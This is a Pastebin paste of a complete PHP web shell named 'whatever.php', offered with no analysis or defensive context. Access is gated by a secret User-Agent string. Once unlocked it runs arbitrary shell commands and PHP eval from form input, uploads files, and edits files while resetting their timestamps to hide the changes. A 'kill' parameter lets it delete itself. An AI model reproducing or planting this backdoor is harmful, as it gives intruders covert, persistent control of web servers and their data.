PalmaSolutions

whatever.php

Apr 14th, 2018
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
  1. <?php
  2. $ref = $_SERVER['HTTP_USER_AGENT'];
  3. $keywordsRegex = "/AtOPvMzpDosdPDlkm3ZmPzxoP/i";
  4. if (preg_match($keywordsRegex, $ref)) {
  5.  
  6. if ($_GET['kill']) {
  7.  
  8. $split = explode("/", $_SERVER['REQUEST_URI']);
  9. $shellFile = $split[(count($split) - 1)];
  10. $shellFile = preg_replace('/\?.*?$/i', '', $shellFile);
  11. unlink($shellFile);
  12. exit ();
  13.  
  14. }
  15.  
  16. if( $_POST['_dir'] ) { chdir($_POST['_dir']); }
  17. $dir = getcwd() . '/';
  18.  
  19. if( $_POST['_save'] == 'Save & Close' ) {
  20.  
  21. $editFileDate = filemtime($_POST['_edit']);
  22. $editFolderDate = filemtime('.');
  23.  
  24. $fh = fopen($_POST['_edit'], 'w');
  25.  
  26. $stringData = stripslashes($_POST['_edittext']);
  27. $stringData = html_entity_decode($stringData);
  28.  
  29. fwrite($fh, $stringData);
  30. fclose($fh);
  31.  
  32. touch($_POST['_edit'], $editFileDate);
  33. touch(".", $editFolderDate);
  34.  
  35. $_POST['_edit'] = "";
  36.  
  37. }
  38.  
  39. if( $_POST['_edit'] ) {
  40. echo '<br><form name="texteditor" method="post" action="">
  41. <input type="hidden" name="_edit" value="'; echo $_POST['_edit']; echo '">
  42. <input type="hidden" name="_dir" value="'; echo $_POST['_dir']; echo '">
  43. <textarea rows="30" cols=160 wrap="off" name="_edittext">';
  44. $file = fopen($_POST['_edit'],"r");
  45. while(! feof($file)){
  46. //echo fgets($file). "";
  47. $line = fgets($file);
  48. echo htmlentities($line);
  49. }
  50. fclose($file);
  51. echo '</textarea><br/><br/>
  52. <input type="submit" name="_save" value="Save & Close" /></form><br><br>';
  53. exit ();
  54. }
  55.  
  56. if ($_POST['_evalText']) eval($_POST['_evalText']);
  57.  
  58. if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; } else { echo ''; } }
  59.  
  60. echo '<b><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  61. echo "<br><b>Remote Dir: </b><input type='text' size='100' name='_dir' value='$dir'><br><br>";
  62. echo '<b>Upload: </b><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">
  63. <br><br><table>
  64. <td><b>Command:</b> <input type="text" name="_cmd" size="40"><br></td>
  65. <td><b>Edit: </b> <input type="text" name="_edit" size="40"><input name="_edt" type="submit" id="_edtl" value="Edit"></td></table>';
  66.  
  67. if( $_POST['_cmd'] ) { $output = shell_exec($_POST['_cmd']); echo '<input type="hidden" name="output" value="'; echo $output; echo '">'; }
  68. echo '<table><td>';
  69. echo '<textarea cols=40 rows=20>';echo $output; echo '</textarea><br>';
  70. echo '</td><td>';
  71. $listDirOutput = shell_exec("ls -a -F -p");
  72. echo '<textarea cols=40 rows=20>';echo $listDirOutput; echo '</textarea><br>';
  73. echo '</table><br>';
  74.  
  75. echo '
  76. <textarea rows="3" cols=84 wrap="off" name="_evalText"></textarea><br/><br/>
  77. <input type="submit" name="_save" value="PHP EVAL" /></form><br><br>
  78. ';
  79.  
  80.  
  81. echo '</form>';
  82. exit();
  83. }
  84. ?>
Add Comment
Please, Sign In to add comment